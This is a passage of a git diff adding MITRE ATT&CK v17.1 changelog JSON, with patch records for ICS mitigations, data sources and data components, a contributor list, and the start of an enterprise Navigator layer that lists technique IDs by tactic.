\"old_value\": \"2025-04-16 21:26:30.453000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 20:15:34.146000+00:00", + "modified": "2025-04-25 14:39:15.463000+00:00", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0920", + "external_id": "M0920" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:15.463000+00:00\", \"old_value\": \"2025-04-16 21:26:28.819000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 21:16:18.709000+00:00", + "modified": "2025-04-25 14:39:20.300000+00:00", + "name": "Safety Instrumented Systems", + "description": "Utilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0812", + "external_id": "M0812" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:20.300000+00:00\", \"old_value\": \"2025-04-16 21:26:32.513000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 19:55:50.927000+00:00", + "modified": "2025-04-25 14:39:19.937000+00:00", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0919", + "external_id": "M0919" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:19.937000+00:00\", \"old_value\": \"2025-04-16 21:26:32.342000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--98aa0d61-fc9d-4b2d-8f18-b25d03549f53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-06-06 21:16:18.709000+00:00", + "modified": "2025-04-25 14:39:17.436000+00:00", + "name": "Watchdog Timers", + "description": "Utilize watchdog timers to ensure devices can quickly detect whether a system is unresponsive.", + "revoked": false, + "labels": [ + "IEC 62443-4-2:2019 - CR 7.2" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0815", + "external_id": "M0815" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:39:17.436000+00:00\", \"old_value\": \"2025-04-16 21:26:30.248000+00:00\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datasources": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.068Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.068Z\", \"old_value\": \"2025-04-16T20:39:10.207Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.700Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.700Z\", \"old_value\": \"2025-04-18T15:12:29.888Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:07.251Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:07.251Z\", \"old_value\": \"2025-04-18T15:12:49.401Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.151Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.151Z\", \"old_value\": \"2025-04-18T15:12:13.134Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.613Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.613Z\", \"old_value\": \"2025-04-18T15:09:58.319Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.238Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.238Z\", \"old_value\": \"2025-04-18T15:11:33.637Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:04.346Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:04.346Z\", \"old_value\": \"2025-04-18T15:10:47.833Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.783Z", + "name": "Windows Registry", + "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.783Z\", \"old_value\": \"2025-04-16T20:39:08.970Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datacomponents": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:55.892Z", + "name": "Device Alarm", + "description": "This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:55.892Z\", \"old_value\": \"2025-04-16T21:26:36.998Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--39b9db72-8b48-4595-a18d-db5bbba3091b", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:59.118Z", + "name": "Logon Session Metadata", + "description": "Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:59.118Z\", \"old_value\": \"2025-04-18T15:12:23.075Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:54.996Z", + "name": "Process History/Live Data", + "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:54.996Z\", \"old_value\": \"2025-04-16T21:26:36.842Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:52.496Z", + "name": "Process/Event Alarm", + "description": "This includes a list of any process alarms or alerts produced to indicate unusual or concerning activity within the operational process (e.g., increased temperature/pressure)", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:52.496Z\", \"old_value\": \"2025-04-16T21:26:36.694Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:56.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:56.271Z\", \"old_value\": \"2025-04-18T15:11:39.543Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:39:52.137Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:39:52.137Z\", \"old_value\": \"2025-04-18T15:10:51.004Z\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + } + }, + "new-contributors": [ + "Daniel Acevedo, ARMADO", + "Edward Stevens, BT Security", + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada", + "Hannah S", + "Matt Brenton, Zurich Global Information Security", + "Michael Davis, ServiceNow Threat Intelligence", + "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd", + "Prinesha Dobariya", + "Purinut Wongwaiwuttiguldej", + "Raghvendra Mishra, Arista Networks", + "SeungYoul Yoo, Ahn Lab", + "The DFIR Report", + "Vlad Shumaher, Palo Alto Networks" + ] +} \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/layer-enterprise.json b/modules/resources/docs/changelogs/v17.0-v17.1/layer-enterprise.json new file mode 100644 index 00000000000..6975fe4b431 --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/layer-enterprise.json @@ -0,0 +1,706 @@ +{ + "versions": { + "layer": "4.5", + "navigator": "5.0.0", + "attack": "17.1" + }, + "name": "May 2025 Enterprise Updates", + "description": "Enterprise updates for the May 2025 release of ATT&CK", + "domain": "enterprise-attack", + "techniques": [ + { + "techniqueID": "T1546.011", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1546.011", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.004", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1102.002", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1027.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1185", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.012", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.012", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.012", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1559.001", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1568.003", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1102.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1491", + "tactic": "impact", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1600.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1090.004", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1601.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1568", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.011", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.011", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1008", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1568.001", + "tactic": 